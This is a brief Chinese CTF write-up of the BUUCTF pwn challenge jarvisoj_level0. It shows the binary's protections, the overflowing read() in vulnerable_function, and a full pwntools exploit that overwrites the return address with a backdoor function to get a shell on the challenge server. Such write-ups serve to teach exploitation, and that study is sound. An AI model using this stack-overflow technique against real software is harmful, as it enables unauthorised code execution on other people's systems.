zoukankan      html  css  js  c++  java
  • [buuctf] pwn-jarvisoj_level0

    jarvisoj_level0

    查看文件保护

        Arch:     amd64-64-little
        RELRO:    No RELRO
        Stack:    No canary found
        NX:       NX enabled
        PIE:      No PIE (0x400000)
    

    64位程序,只开启了nx保护,ida分析

    ssize_t vulnerable_function()
    {
      char buf; // [rsp+0h] [rbp-80h]
    
      return read(0, &buf, 0x200uLL);
    }
    

    存在栈溢出漏洞,并且存在后门函数,exp如下

    from pwn import *
    r = remote('node3.buuoj.cn',28186)
    backdoor_addr = 0x400596
    payload = b'a'*0x88+p64(backdoor_addr)
    r.sendline(payload)
    r.interactive()
    

    作者:寒江寻影
    本文版权归作者和博客园共有,欢迎转载,但未经作者同意必须在文章页面给出原文链接,否则保留追究法律责任的权利。
  • 相关阅读:
    随笔
    随笔
    第一个存储过程
    mysql 存储过程
    join
    随笔
    玩家注册登录
    mysql 存储二进制数据
    mysql学习
    socket listen/accept
  • 原文地址:https://www.cnblogs.com/crfshadow/p/14502489.html
Copyright © 2011-2022 走看看